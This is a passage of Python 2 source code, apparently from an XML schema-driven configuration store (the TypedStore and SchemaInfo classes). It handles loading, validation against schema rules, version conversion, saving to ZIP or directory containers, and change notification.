if not isinstance(schema,Schema): schema = Schema.create(schema)
self.schema = schema
# Get schema version
self.version = self.schema.getVersion()
self.originalversion = None
# Allow subclasses to provide custom data types
self.customdatatypes = self.getCustomDataTypes()
# Events
self.interfaces = []
self.blockedinterfaces = set()
self.otherstores = otherstores
for v in self.otherstores.itervalues(): v.addref()
# Link to original source (if any)
self.path = None
# Clear store variables
self.context = {}
self.defaultstore = None
self.defaultinterface = None
self.root = None
# Add store with default values if requested and available.
if adddefault:
defscenario = self.getDefault(self.version)
if defscenario is not None: self.setDefaultStore(defscenario,updatevisibility=False)
# Now set current values in the store
# NB: this must be done after default values are set, so that the default
# values can be taken into account when checking conditions (via setStore)
self.setStore(valueroot)
# Validation history: list of valid nodes
self.validnodes = set()
def unlink(self):
"""Destroys the store and breaks circular references. The TypedStore object
should not be used after this method has been called!
"""
if self.root is not None: self.root.destroy()
self.root = None
# Release container
self.setContainer(None)
# Release default store
if self.defaultstore is not None:
self.defaultstore.disconnectInterface(self.defaultinterface)
self.defaultinterface = None
self.defaultstore.release()
self.defaultstore = None
# Release any linked objects
if 'linkedobjects' in self.context:
for v in self.context['linkedobjects'].itervalues(): v.release()
del self.context['linkedobjects']
# Release any linked stores
for v in self.otherstores.itervalues(): v.release()
# Release all interfaces
for i in self.interfaces: i.unlink()
self.interfaces = []
def getDataType(self,name):
if name in self.customdatatypes: return self.customdatatypes[name]
datatype = datatypes.get(name)
assert datatype is not None,'Unknown data type "%s" requested.' % name
return datatype
@classmethod
def getCustomDataTypes(cls):
return {}
def getInterface(self,**kwargs):
"""Returns an interface to the store. Interfaces offer several facilities
to e.g. consistently show or hide nodes with the "hidden" property, and to
omit schema nodes that are meant for grouping only (with the "grouponly"
attribute). Also, interfaces provide the *only* means of being notified by the
store about changes of node value, visibility, etc.
Remember to call store.disconnectInterface after you are done with the interface.
"""
return TypedStoreInterface(self,**kwargs)
def setContainer(self,container):
"""Sets the container to be used by nodes that point to external data.
This function also clears the cache with external data objects.
"""
if 'cache' in self.context:
for v in self.context['cache'].itervalues(): v.release()
del self.context['cache']
if self.context.get('container',None) is not None:
self.context['container'].release()
if container is not None: container.addref()
self.context['container'] = container
def setStore(self,valueroot,resolvelinks=True):
"""Provides an XML DOM tree with values for the TypedStore. This
replaces any existing values. The values can be specified as a
path to an XML file (i.e., a string), an XML document, or an XML
node. None may be specified instead to clear the store of all values.
"""
if self.root is not None: self.root.destroy()
if 'linkedobjects' in self.context:
for n,v in self.context['linkedobjects'].iteritems():
assert isinstance(v,util.referencedobject), 'Linked file %s is not of type util.referencedobject.' % n
v.release()
del self.context['linkedobjects']
templateroot = self.schema.getRoot()
assert valueroot is None or isinstance(valueroot,basestring) or isinstance(valueroot,xml.dom.Node), 'Supplied value root must None, a path to an XML file, or an XML node, but is %s.' % valueroot
valuedom,docpath = None,''
if valueroot is None:
impl = xml.dom.minidom.getDOMImplementation()
assert templateroot.hasAttribute('name'), 'Root of the schema does not have attribute "name".'
valuedom = impl.createDocument(None, templateroot.getAttribute('name'), None)
valueroot = valuedom.documentElement
valueroot.setAttribute('version',self.version)
elif isinstance(valueroot,basestring):
docpath = valueroot
valuedom = xml.dom.minidom.parse(valueroot)
valueroot = valuedom.documentElement
elif valueroot.nodeType==valueroot.DOCUMENT_NODE:
valuedom = valueroot
valueroot = valuedom.documentElement
else:
valuedom = valueroot
while valuedom.parentNode is not None: valuedom = valuedom.parentNode
assert valuedom.nodeType==valuedom.DOCUMENT_NODE, 'Could not find DOM document node.'
valuesversion = valueroot.getAttribute('version')
assert valuesversion==self.version or valuesversion=='', 'Versions of the xml schema ("%s") and and the xml values ("%s") do not match.' % (self.version,valuesversion)
if not valueroot.hasAttribute('syntax'):
syntax = (1,0)
else:
syntax = tuple(map(int,valueroot.getAttribute('syntax').split('.')))
self.xmldocument = valuedom
self.xmlroot = valueroot
self.context = {}
# Resolve links to external XML documents (if any)
if resolvelinks:
def processnode(node,refpath):
for ch in node.childNodes:
if ch.nodeType==ch.ELEMENT_NODE: processnode(ch,refpath)
if node.hasAttribute('link'):
linkedpath = Schema.resolveLinkedPath(node.getAttribute('link'))
if not os.path.isfile(linkedpath):
raise Exception('Linked values file "%s" does not exist.' % linkedpath)
childdom = xml.dom.minidom.parse(linkedpath)
for sourcech in childdom.documentElement.childNodes:
cpy = util.copyNode(sourcech,node,targetdoc=valuedom)
if cpy.nodeType==cpy.ELEMENT_NODE: processnode(cpy,linkedpath)
node.removeAttribute('link')
processnode(self.xmlroot,docpath)
self.root = Node(self,templateroot,self.xmlroot,[],None)
self.changed = False
self.setContainer(None)
# Update the visibility of all nodes - based on conditions
# Disable individual notifications because the single "storechanged" event emitted
# below replaces them)
self.root.updateVisibility(recursive=True,notify=False)
# Notify attached interface about the store change.
self.afterStoreChange()
def setDefaultStore(self,store,updatevisibility=True):
"""Attached a TypedStore object with default values. The attached
store MUST use the same schema as the store that is attached to.
"""
assert self.version==store.version,'Version of supplied default store must match version of current store.'
if self.defaultstore is not None:
self.defaultstore.disconnectInterface(self.defaultinterface)
self.defaultinterface = None
self.defaultstore.release()
self.defaultstore = store.addref()
self.defaultinterface = self.defaultstore.getInterface()
self.defaultinterface.connect('afterChange',self.onDefaultChange)
# Default nodes are used in condition checking, so changing the default store
# requires updating the visibility of all nodes. Do so, unless explicitly said not to.
if updatevisibility: self.root.updateVisibility(recursive=True)
def hasChanged(self):
"""Returns whether any value in the store has changed since the values
were loaded (through "setStore"), or since "resetChanged" was called.
"""
if self.changed: return True
for v in self.context.get('linkedobjects',{}).itervalues():
if isinstance(v,TypedStore) and v.hasChanged(): return True
return False
def resetChanged(self):
"""Resets the "changed" status of the store to "unchanged".
See also "hasChanged".
"""
self.changed = False
for v in self.context.get('linkedobjects',{}).itervalues():
if isinstance(v,TypedStore): v.resetChanged()
def __getitem__(self,path):
"""Returns node at the specified path below the root of the tree.
"""
return self.root[path]
def findNode(self,path,create=False):
pathcomps = path.split('/')
node = self.root.getLocation(pathcomps,createoptional=create)
if node is None and not path.startswith('/'):
curparents = [self.root]
while curparents:
nextparents = []
for par in curparents:
for ch in par.children:
node = ch.getLocation(pathcomps,createoptional=create)
if node is not None: return node
nextparents += par.children
curparents = nextparents
return node
def mapForeignNode(self,foreignnode):
"""Takes a node from another TypedStore that uses the same XML schema,
and returns the equivalent node in the current store. Used for finding
corresponding nodes in the store with defaults, among others.
"""
indices = []
currentnode = foreignnode
# First we walk up the tree from the supplied foreign node, in order to find the indices
# of all involved ancestors.
for name in reversed(foreignnode.location):
if not currentnode.canHaveClones():
# This node must appear once; its index can only be zero.
indices.insert(0,0)
else:
# This node can appear zero or more times. It can be identified
# by its unique id, or if not available, by its number.
index = currentnode.getSecondaryId()
if index=='':
siblings = currentnode.parent.getLocationMultiple([name])
for (index,sib) in enumerate(siblings):
if sib is currentnode: break
else:
assert False, 'Cannot find foreign node "%s" in list of its own siblings.' % name
indices.insert(0,index)
currentnode = currentnode.parent
assert currentnode.parent is None, 'Location does not describe complete path to root. Currently at %s.' % currentnode
# Now find the same location in our own store.
currentnode = self.root
for (name,index) in zip(foreignnode.location,indices):
if isinstance(index,int):
currentnode = currentnode.getChildByNumber(name,index)
else:
currentnode = currentnode.getChildById(name,index)
if currentnode is None: return None
return currentnode
def persist(self,callback=None):
"""Directs all custom nodes to store their custom contents in a container."""
nodes = [node for node in self.root.getNodesByType(datatypes.DataType,True) if node.valuenode is not None]
progslicer = util.ProgressSlicer(callback,len(nodes))
for node in nodes:
progslicer.nextStep(node.getText(1))
value = node.getValue()
if isinstance(value,datatypes.DataType):
value.persist(node.valuenode,self.context)
if isinstance(value,util.referencedobject): value.release()
def preparePersist(self):
"""Prepares custom nodes for being stored on disk.
This functionality is used by DataFile objects to read all
data from the source archive before it is overwritten by
an in-place save.
"""
nodes = self.root.getNodesByType(datatypes.DataType,True)
for node in nodes:
value = node.getValue()
if isinstance(value,datatypes.DataType):
value.preparePersist(node.valuenode,self.context)
if isinstance(value,util.referencedobject): value.release()
def checkCondition(self,nodeCondition,ownernode,ownstorename=None):
"""Checks whether the condition specified by the specified XML "conditon" node
from the schema is met. The specified ownernode is used to resolve references to
relative paths; it is the first ancestor of the condition that is of type
element.
"""
assert nodeCondition.hasAttribute('type'), 'condition lacks "type" attribute in XML schema file.'
src = nodeCondition.getAttribute('source')
if src!='' and src!=ownstorename:
if src not in self.otherstores: return True
return self.otherstores[src].checkCondition(nodeCondition,ownernode,ownstorename=src)
condtype = nodeCondition.getAttribute('type')
if condtype=='eq' or condtype=='ne':
# Check for required XML attributes
assert nodeCondition.hasAttribute('variable'), 'condition lacks "variable" attribute in XML schema file.'
assert nodeCondition.hasAttribute('value'), 'condition lacks "value" attribute in XML schema file.'
valuepath = nodeCondition.getAttribute('variable')
refnode = self.root
if valuepath[0]!='/': refnode = ownernode.parent
node = refnode[valuepath]
assert node is not None, 'Cannot locate dependency "%s" for node "%s".' % (nodeCondition.getAttribute('variable'),ownernode)
# Get the current value of the variable we depend on
curvalue = node.getValue(usedefault=True)
# If the node in question currently does not have a value, we cannot check the condition;
# just return 'valid'.
if curvalue is None: return True
# Get the reference value we will compare against
assert isinstance(curvalue,datatypes.DataTypeSimple), 'Data type of target node of condition must be DataTypeSimple, but is %s.' % (curvalue.__class__,)
refvalue = curvalue.fromXmlString(nodeCondition.getAttribute('value'),{},node.templatenode)
# Compare
if condtype=='eq':
result = (curvalue==refvalue)
else:
result = (curvalue!=refvalue)
if isinstance(curvalue,util.referencedobject): curvalue.release()
return result
elif condtype=='and' or condtype=='or':
# Check every child condition.
for ch in nodeCondition.childNodes:
if ch.nodeType==ch.ELEMENT_NODE and ch.localName=='condition':
if self.checkCondition(ch,ownernode):
# OR query: one True guarantees success
if condtype=='or': return True
else:
# AND query: one False guarantees failure
if condtype=='and': return False
# We evaluated all children. If we are doing an OR, that means all
# children returned False: we failed, if we are doing an AND, all
# children returned True: we succeeded.
if condtype=='and': return True
return False
else:
raise Exception('unknown condition type "%s" in XML schema file.' % condtype)
def fillMissingValues(self,skiphidden=False):
"""For every node that does not have a value, set its value to the default.
Set "skiphidden" to True to leave the value of nodes that are currently hidden
untouched.
"""
assert self.defaultstore is not None, 'Cannot fill missing values with defaults because no default store has been specified.'
if skiphidden:
for n in self.root.getEmptyNodes():
if not n.isHidden():
defvalue = n.getDefaultValue()
n.setValue(defvalue)
if isinstance(defvalue,util.referencedobject): defvalue.release()
else:
self.root.copyFrom(self.defaultstore.root,replace=replaceNever)
def clearValidationHistory(self,nodes=None):
if nodes is None:
self.validnodes.clear()
else:
self.validnodes -= set(nodes)
def updateValidationHistory(self,validity):
for node,valid in validity.iteritems():
if valid:
self.validnodes.add(node)
else:
self.validnodes.discard(node)
def validate(self,nodes=None,usedefault=True,repair=0,callback=None,usehistory=True):
# If no nodes were specified explicitly, we must validate all.
if nodes is None: nodes = self.root.getDescendants()
# Call base implementation
errors, validity = self._validate(nodes,usedefault=usedefault,repair=repair,callback=callback,usehistory=usehistory)
# Update validation history (if required)
if usehistory: self.updateValidationHistory(validity)
# Returns list of validation errors (strings)
return errors
def _validate(self,nodes,usedefault=True,repair=0,callback=None,usehistory=True):
errors = []
validity = dict([(node,True) for node in nodes])
# Retrieve validation history (this is a set containing the nodes that
# have been found valid in previous calls to "validate")
if usehistory:
oldvalids = self.validnodes
else:
oldvalids = set()
# Build relevant subsets of node list.
customnodes,selectnodes,emptynodes,lboundnodes,uboundnodes = [],[],[],[],[]
for node in nodes:
if not node.canHaveValue(): continue
type = node.getValueType()
value = node.getValue(usedefault=usedefault)
if value is None:
emptynodes.append(node)
elif value.hasExpensiveValidate():
customnodes.append(node)
if node.templatenode.hasAttribute('hasoptions'):
selectnodes.append(node)
if node.templatenode.hasAttribute('minInclusive'):
lboundnodes.append(node)
if node.templatenode.hasAttribute('maxInclusive'):
uboundnodes.append(node)
if isinstance(value,util.referencedobject): value.release()
# Find used nodes that have not been set, and lack a default value.
for node in emptynodes:
if node.isHidden(): continue
validity[node] = False
errors.append('variable "%s" has not been set.' % node.getText(1))
# Find used file nodes that have not been supplied with data.
visiblecustomnodes = [node for node in customnodes if not node.isHidden()]
progslicer = util.ProgressSlicer(callback,len(visiblecustomnodes))
for node in visiblecustomnodes:
progslicer.nextStep('validating '+node.getText(detail=1))
value = node.getValue(usedefault=usedefault)
if not value.validate(node.templatenode,callback=progslicer.getStepCallback()):
validity[node] = False
errors.append('variable "%s" is set to an invalid value.' % node.getText(1))
if isinstance(value,util.referencedobject): value.release()
# Find nodes of type "select" that have been set to an invalid (non-existing) option.
for node in selectnodes:
value = node.getValue(usedefault=usedefault)
opt = 0
if value is not None:
optionsroot = util.findDescendantNode(node.templatenode,['options'])
assert optionsroot is not None, 'Schema node %s is of type "select", but lacks the "options" child node.' % node
for ch in optionsroot.childNodes:
if ch.nodeType==ch.ELEMENT_NODE and ch.localName=='option':
chvalue = value.fromXmlString(ch.getAttribute('value'),{},node.templatenode)
if value==chvalue:
opt = 1
if ch.getAttribute('disabled')!='True': opt = 2
break
if opt!=2:
if repair==2 or (repair==1 and node.isHidden()):
node.setValue(node.getDefaultValue())
elif opt==1:
validity[node] = False
errors.append('variable "%s" is set to option "%s" (%s), which is currently disabled (perhaps not yet implemented).' % (node.getText(1),ch.getAttribute('label'),value.toPrettyString()))
else:
validity[node] = False
errors.append('variable "%s" is set to non-existent option %s.' % (node.getText(1),value.toPrettyString()))
if isinstance(value,util.referencedobject): value.release()
# Find nodes with numeric data types, and check if they respect specified ranges (if any).
for node in lboundnodes:
value = node.getValue(usedefault=usedefault)
if value is not None:
minval = value.fromXmlString(node.templatenode.getAttribute('minInclusive'),{},node.templatenode)
if value<minval:
if repair==2 or (repair==1 and node.isHidden()):
node.setValue(minval)
else:
validity[node] = False
errors.append('variable "%s" is set to %s, which lies below the minimum of %s.' % (node.getText(1),value.toPrettyString(),minval.toPrettyString()))
if isinstance(value,util.referencedobject): value.release()
for node in uboundnodes:
value = node.getValue(usedefault=usedefault)
if value is not None:
maxval = value.fromXmlString(node.templatenode.getAttribute('maxInclusive'),{},node.templatenode)
if value>maxval:
if repair==2 or (repair==1 and node.isHidden()):
node.setValue(maxval)
else:
validity[node] = False
errors.append('variable "%s" is set to %s, which lies above the maximum of %s.' % (node.getText(1),value.toPrettyString(),maxval.toPrettyString()))
if isinstance(value,util.referencedobject): value.release()
def performTest(testnode):
"""Validates nodes against a custom validation rule provided in XML.
"""
def cleanup():
for value in namespace.itervalues():
if isinstance(value,util.referencedobject): value.release()
def validate(namespace,affectednodes):
try:
for ch in testnode.childNodes:
if ch.nodeType!=ch.ELEMENT_NODE: continue
if ch.localName=='error':
# Validation based on expression
assert ch.hasAttribute('expression'),'"expression" attribute not set on validation/rule/test node.'
assert ch.hasAttribute('description'),'"description" attribute not set on validation/rule/test node.'
if eval(ch.getAttribute('expression'),namespace):
raise ValidationException(ch.getAttribute('description'))
elif ch.localName=='custom':
# Validation based on custom Python code
for data in ch.childNodes:
if data.nodeType==data.CDATA_SECTION_NODE: break
code = compile(data.nodeValue,'<string>','exec')
exec code in namespace
except ValidationException,e:
# Flag all affected nodes as invalid and register the error message.
for node in affectednodes:
if node in validity: validity[node] = False
errors.append(unicode(e))
# Get values for all variables that this rule uses.
namespace = {'ValidationException':ValidationException}
valuenodes = []
hastestablenodes = False
anyvartype,anyvarsymbol,anyvarname = None,None,None
for ch in testnode.childNodes:
if ch.nodeType!=ch.ELEMENT_NODE: continue
if ch.localName=='variable':
assert ch.hasAttribute('path'),'"path" attribute not set on validation/rule/variable node.'
path = ch.getAttribute('path')
name = path.split('/')[-1]
valuenode = self[path]
if valuenode.isHidden() and repair!=0:
# Dependent node is hidden and validation is not strict - skip this test.
return cleanup()
if validity.get(valuenode,False):
# Dependant node is currently being validated - this test must be executed.
hastestablenodes = True
elif valuenode not in oldvalids:
# Dependant node is (A) not currently validated and (B) has also not previously found to be valid.
# (if (B), it would have been usable to validate the value of other currently tested nodes)
# Skip this test.
return cleanup()
namespace[name] = valuenode.getValue(usedefault=usedefault)
valuenodes.append(valuenode)
elif ch.localName=='anyvariable':
assert ch.hasAttribute('type'),'"type" attribute not set on validation/rule/anyvariable node.'
assert ch.hasAttribute('valuesymbol'),'"valuesymbol" attribute not set on validation/rule/anyvariable node.'
assert ch.hasAttribute('namesymbol'),'"namesymbol" attribute not set on validation/rule/anyvariable node.'
assert anyvartype is None,'Only one validation/rule/variable node can have the type attribute.'
anyvartype = ch.getAttribute('type')
anyvarsymbol = ch.getAttribute('valuesymbol')
anyvarname = ch.getAttribute('namesymbol')
# Perform actual validation.
if anyvartype is not None:
# This rule applies to all nodes with a particular data type.
for node in nodes:
if node.getValueType()==anyvartype and validity[node] and not (node.isHidden() and repair!=0):
curnamspace = dict(namespace)
value = node.getValue(usedefault=usedefault)
curnamspace[anyvarsymbol] = value
curnamspace[anyvarname] = node.getText(detail=1)
validate(curnamspace,valuenodes+[node])
if isinstance(value,util.referencedobject): value.release()
else:
# This rule applies to specific named nodes only.
if hastestablenodes: validate(namespace,valuenodes)
return cleanup()
# Apply custom validation rules, if set.
templateroot = self.schema.getRoot()
for validationnode in templateroot.childNodes:
if validationnode.nodeType==validationnode.ELEMENT_NODE and validationnode.localName=='validation':
for testnode in validationnode.childNodes:
if testnode.nodeType==testnode.ELEMENT_NODE and testnode.localName=='test': performTest(testnode)
break
return errors,validity
def convert(self,target,callback=None,usedefaults=True,matchednodes=None):
"""Converts the TypedStore object to the specified target. The target may be
a version string (a new TypedStore object with the desired version will be created)
or an existing TypedStore object with the different version.
"""
if isinstance(target,basestring):
if target==self.version:
return self.addref()
target = self.fromSchemaName(target)
elif target.version==self.version:
return target
convertor = self.getSchemaInfo().getConverter(self.version,target.version)
if convertor is None:
raise Exception('No convertor available to convert version "%s" to "%s".' % (self.version,target.version))
convertor.convert(self,target,callback=callback,usedefaults=usedefaults,matchednodes=matchednodes)
return target
@classmethod
def rankSources(cls,sourceids,targetid=None,requireplatform=None):
"""Rank a set of supplied versions/identifiers according to platform (i.e. gotmgui, gotm)
and version. Rank criterion is 'closeness' (in version and platform) to the reference
targetid.
"""
if targetid is not None:
(targetplatform,targetversion) = targetid.split('-')
targetversion = versionStringToInt(targetversion)
# Decompose source ids into name and (integer) version, but only take
# source we can actually convert to the target version.
sourceinfo = []
for sid in sourceids:
if targetid is None or sid==targetid or cls.getSchemaInfo().hasConverter(sid,targetid):
(platform,version) = sid.split('-')
if requireplatform is None or requireplatform==platform:
version = versionStringToInt(version)
sourceinfo.append((platform,version,sid))
# Sort by platform (because we want the target platform first)
sourceinfoclasses = {}
for sinf in sourceinfo:
sourceinfoclasses.setdefault(sinf[0],[]).append(sinf)
# Now sort per platform according to version (higher versions first)
result = []
for sourceplatform in sourceinfoclasses.keys():
infos = sourceinfoclasses[sourceplatform]
infos.sort(cmp=lambda x,y: cmp(y[1],x[1]))
if targetid is not None and sourceplatform==targetplatform:
result = infos+result
else:
result += infos
resultids = []
for res in result: resultids.append(res[2])
return resultids
@classmethod
def canBeOpened(cls, container):
"""Returns whether the specified path can be opened as a TypedStore object."""
assert isinstance(container,datatypes.DataContainer), 'Argument must be data container object.'
files = container.listFiles()
for name in cls.getSchemaInfo().getPackagedValuesNames():
if name in files: return True
return False
def load(self,path):
"""Loads values from an existing XML values file. This file may have been saved with the
"save" method, or it may be taken from a container saved with the "saveAll" method.
If the version of the XML file does not match the version of the store, conversion
is attempted."""
self.fromXmlFile(path,targetstore=self)
def loadAll(self,path,callback=None):
"""Loads values plus associated data from the specified path. The path should point
to a valid data container, i.e., a ZIP file, TAR/GZ file, or a directory. The source
container typically has been saved through the "saveAll" method.
"""
self.fromContainer(path,callback,targetstore=self)
def save(self,path):
"""Saves the values as XML, to the specified path. A file saved in this manner
might be loaded again through the "load" method."""
util.stripWhitespace(self.xmlroot)
f = codecs.open(path,'w','utf-8')
self.xmldocument.writexml(f,encoding='utf-8',addindent='\t',newl='\n')
f.close()
def saveAll(self,path,targetversion=None,targetisdir = False,claim=True,fillmissing=False,callback=None):
"""Saves the values plus any associated data in a ZIP archive or directory.
A file or directory created in this manner may be loaded again through the
"loadAll" method.
The "claim" argument decides whether the TypedStore object will, after the save,
refer to the newly saved container for external data objects. If this is not
set, the TypedStore will after the save still use its original container for
external data objects.
"""
if targetversion is not None and self.version!=targetversion:
progslicer = util.ProgressSlicer(callback,3)
# First convert to the target version
progslicer.nextStep('converting to version %s' % targetversion)
matches = {}
tempstore = self.convert(targetversion,callback=progslicer.getStepCallback(),matchednodes=matches)
# Now save the result of the conversion.
progslicer.nextStep('saving')
tempstore.saveAll(path, targetversion=targetversion, targetisdir=targetisdir, fillmissing=fillmissing, callback=progslicer.getStepCallback())
if claim:
# Assign the value of all saved variables with separate data to the original data store,
# where possible. Ideally, this can be done for all variables with separate data, allowing
# the original source file of the original data store to be released.
progslicer.nextStep('redirecting variables with separate data to saved file.')
callback = progslicer.getStepCallback()
for imatch,(savednode,sourcenode) in enumerate(matches.iteritems()):
callback(float(imatch)/len(matches),'redirecting variable %i.' % imatch)
cls = sourcenode.getValueType(returnclass=True)
if cls is not None and issubclass(cls,util.referencedobject):
savedvalue = savednode.getValue()
if savedvalue is not None:
sourcenode.setValue(savedvalue)
savedvalue.release()
# Release the conversion result.
tempstore.release()
else:
progslicer = util.ProgressSlicer(callback,2)
# First: fill nodes that are not set with the default value.
if fillmissing: self.fillMissingValues()
# Before opening the target container, allow nodes to prepare for saving to the specified path.
# Specifically, nodes will read all files that might be overwritten into memory.
if isinstance(path,basestring):
self.context['targetcontainerpath'] = path
self.preparePersist()
del self.context['targetcontainerpath']
# Open target container
if isinstance(path,basestring):
if targetisdir:
container = datatypes.DataContainerDirectory(path,create=True)
else:
container = datatypes.DataContainerZip(path,mode='w')
elif isinstance(path,StringIO.StringIO):
container = datatypes.DataContainerZip(path,mode='w')
claim = False
else:
assert False,'Supplied target must be a path to file or directory, or a StringIO object.'
# Allow all nodes to add custom data to the target container. This can change the values
# in the XML store, and must therefore be done before the store is added to the container.
self.context['targetcontainer'] = container
self.context['donotclaimtarget'] = (not claim)
progslicer.nextStep('adding data streams')
self.persist(progslicer.getStepCallback())
del self.context['donotclaimtarget']
# Add any other objects that were linked to the store by a node
# of custom type (e.g. DataFileEx)
for name,linkedfile in self.context.get('linkedobjects',{}).iteritems():
assert isinstance(linkedfile,TypedStore), 'Do not know how to add linked file %s of type %s to container.' % (name,str(type(linkedfile)))
df = datatypes.DataFileXmlNode(linkedfile.xmldocument)
df_added = container.addItem(df,name)
df_added.release()
df.release()
# Add XML store to the container
progslicer.nextStep('saving configuration')
df = datatypes.DataFileXmlNode(self.xmldocument)
storefilename = self.schema.getRoot().getAttribute('packagedvaluesname')
if storefilename=='': storefilename = 'values.xml'
df_added = container.addItem(df,storefilename)
df_added.release()
df.release()
# Make the container save all changes and then release it.
# Note if claim=True: even though we release it, many nodes (of type "file") may now hold
# references to data in the saved container; the container will likely not be completely
# released. On the other hand, the original sources that were locked before saving now
# probably will be released (the nodes do not lock them any longer).
container.persistChanges()
container.release()
if isinstance(path,basestring):
self.path = path
else:
self.path = None
self.resetChanged()
def toXml(self,enc='utf-8'):
"""Returns the values as an XML string, with specified encoding."""
return self.xmldocument.toxml(enc)
def toXmlDom(self,target=None):
"""Obtains a copy of the values as XML DOM tree. Values are appended to a newly
created XML document, or to the specified target node, if present."""
return util.copyNode(self.xmlroot,target)
# ----------------------------------------------------------------------------------------
# Event handling
# ----------------------------------------------------------------------------------------
def connectInterface(self,interface):
"""Connects an interface to the store. Interfaces provide events and
can hide nodes with the hidden attribute from view, amongst others."""
self.interfaces.append(interface)
def disconnectInterface(self,interface):
"""Disconnects an interface from the store. This is required to allow
the interface to go completely out of scope, and be cleaned-up."""
for i in range(len(self.interfaces)-1,-1,-1):
if self.interfaces[i] is interface:
self.interfaces.pop(i).unlink()
def onDefaultChange(self,defaultnode,feature):
"""Called internally after a property of a node in the store with default
values has changed. Note that its argument will be a node in the DEFAULT store,
not in the current store! The string "feature" specifies which property has
changed.
"""
# Map node in default store to node in our own store.
ownnode = self.mapForeignNode(defaultnode)
if ownnode is None: return
# Emit change event
for i in self.interfaces:
if i not in self.blockedinterfaces: i.onDefaultChange(ownnode,feature)
# If the default is being used: update (visibility of) nodes that depend on the changed node.
if not ownnode.hasValue(): self.updateDependantNodes(ownnode)
def onChange(self,node,feature):
"""Called internally after a property (e.g., value, unit) of a node has changed.
The string "feature" specifies which property has changed, e.g., "value", "unit".
"""
# Register that we changed.
self.changed = True
# Emit change event
for i in self.interfaces:
if i not in self.blockedinterfaces: i.onChange(node,feature)
# Update (visibility of) nodes that depend on the changed node.
self.updateDependantNodes(node)
def updateDependantNodes(self,node):
"""Called internally after the value of the specified node has changed.
This method then looks up all nodes that depend on the value of the specified
node, and emits events if their visibility/unit/... changes in turn.
"""
# Get nodes that depend on the changed node; if there are none, exit.
deps = util.findDescendantNode(node.templatenode,['dependentvariables'])
if deps is None: return
# Now build a list of the dependant nodes; currently hidden nodes first, currently visible
# nodes last, so that when we iterate over the list and switch visibilities first extra nodes
# will appear, and only later some are removed (this prevents unnecessary automatic scrolling in GUI)
depnodes = []
for d in util.findDescendantNodes(deps,['dependentvariable']):
varpath = d.getAttribute('path')
if varpath[0]!='/':
refnode = node.parent
else:
refnode = self.root
varnode = refnode[varpath]
assert varnode is not None, 'Unable to locate node "%s" at %s.' % (varpath,refnode)
deptype = d.getAttribute('type')
if deptype=='visibility':
if varnode.visible:
depnodes.append(varnode)
else:
depnodes.insert(0,varnode)
else:
self.onChange(varnode,deptype)
for varnode in depnodes: varnode.updateVisibility()
def onBeforeChange(self,node,newvalue):
"""Called internally just before the value of a node changes. The return value
decides if the change is allowed (return True) or denied (return False)."""
for i in self.interfaces:
if i in self.blockedinterfaces: continue
if not i.onBeforeChange(node,newvalue): return False
return True
def afterStoreChange(self):
"""Called internally after the store changes, i.e., all values have changed."""
self.blockedinterfaces = set(self.interfaces)
for i in self.interfaces:
i.afterStoreChange()
self.blockedinterfaces.remove(i)
def beforeVisibilityChange(self,node,visible,showhide=True):
"""Called internally before a node is hidden (showhide=True) or deleted (showhide=False)."""
for i in self.interfaces:
if i not in self.blockedinterfaces: i.beforeVisibilityChange(node,visible,showhide)
def afterVisibilityChange(self,node,visible,showhide=True):
"""Called internally after a node is hidden (showhide=True) or deleted (showhide=False)."""
for i in self.interfaces:
if i not in self.blockedinterfaces: i.afterVisibilityChange(node,visible,showhide)
def versionStringToInt(versionstring):
"""Converts a version string to a representative integer.
Versions may consist of components separated by a dot, e.g., "major.minor.build"
In that case, individual components cannot exceed 255.
"""
comps = versionstring.split('.')
version,base = 0,1
for c in comps[::-1]:
version += int(c)*base
base *= 256
return version
class SchemaInfoCache(object):
def __init__(self):
self.path2info = {}
def __getitem__(self,path):
if path not in self.path2info: self.path2info[path] = SchemaInfo(path)
return self.path2info[path]
schemainfocache = SchemaInfoCache()
class SchemaInfo(object):
def __init__(self,infodir=None):
assert infodir is None or os.path.isdir(infodir),'SchemaInfo object can only be initialized from a directory, but "%s" is not an existing directory.' % infodir
self.schemas = None
self.convertorsfrom = None
self.defaults = None
self.packagedvaluesnames = None
self.infodir = infodir
def getSchemas(self):
"""Returns a dictionary that links schema version strings to paths to the corresponding schema file.
"""
if self.schemas is None:
self.schemas = {}
self.packagedvaluesnames = set()
if self.infodir is not None: self.addSchemas(self.infodir)
return self.schemas
def getPackagedValuesNames(self):
"""Returns a dictionary that links schema version strings to paths to the corresponding schema file.
"""
self.getSchemas()
return self.packagedvaluesnames
def getConverters(self):
"""Returns information on available converters.
This information is provided as a dictionary linking each source version to another dictionary
that links available target versions to the Converter class that can perform the actual
conversion. Only direct conversions are included.
"""
if self.convertorsfrom is None:
self.convertorsfrom = {}
if self.infodir is not None: self.addConverters(self.infodir)
return self.convertorsfrom
def getDefaults(self):
"""Returns a dictionary that links version strings to paths to the corresponding default file.
"""
if self.defaults is None:
self.defaults = {}
if self.infodir is not None: self.addDefaults(self.infodir)
return self.defaults
def getConverter(self,sourceid,targetid,directonly=False):
"""Returns a convertor object, capable of converting between the specified versions.
Conversion routes may be direct (using one convertor object), or indirect (using a
chain of convertor objects). Specify "directonly" to retrieve only direct conversion
routes. Return None if no convertor is available that meets the specified criteria.
"""
# Try direct route first.
if (sourceid in self.getConverters()) and (targetid in self.getConverters()[sourceid]):
return self.getConverters()[sourceid][targetid]()
# Direct route not available, try indirect routes
if not directonly:
indirectroutes = self.findIndirectConversion(sourceid,targetid,depth=' ')
if len(indirectroutes)>0:
indirectroutes.sort(key=len)
route = indirectroutes[0]
chain = []
for istep in range(len(route)-1):
convertor = self.getConverter(route[istep],route[istep+1],directonly=True)
chain.append(convertor)
return versioning.ConvertorChain(chain)
# No route available.
return None
def findIndirectConversion(self,sourceid,targetid,disallowed=[],depth=''):
"""Returns all conversion routes between the specified source version and target
version. Use of intermediate versions specified in "disallowed" will be avoided
(this is used specifically for prevetion of circular conversion routes). The
depth argument is used for debugging output only."""
next = self.getConverters().get(sourceid,{}).keys()
routes = []
curdisallowed = disallowed[:]+[sourceid]
for curnext in next:
if curnext in curdisallowed: continue
if curnext==targetid:
routes.append([sourceid,curnext])
else:
childroutes = self.findIndirectConversion(curnext,targetid,curdisallowed,depth=depth+' ')
for cr in childroutes:
routes.append([sourceid]+cr)
return routes
def addSchemas(self,dirpath):
assert os.path.isdir(dirpath),'Provided path "%s" must be a directory.' % dirpath
for name in os.listdir(dirpath):
fullpath = os.path.join(dirpath,name)
if os.path.isfile(fullpath):
(basename,ext) = os.path.splitext(name)
if ext=='.schema':
rootname,rootattr = util.getRootNodeInfo(fullpath)
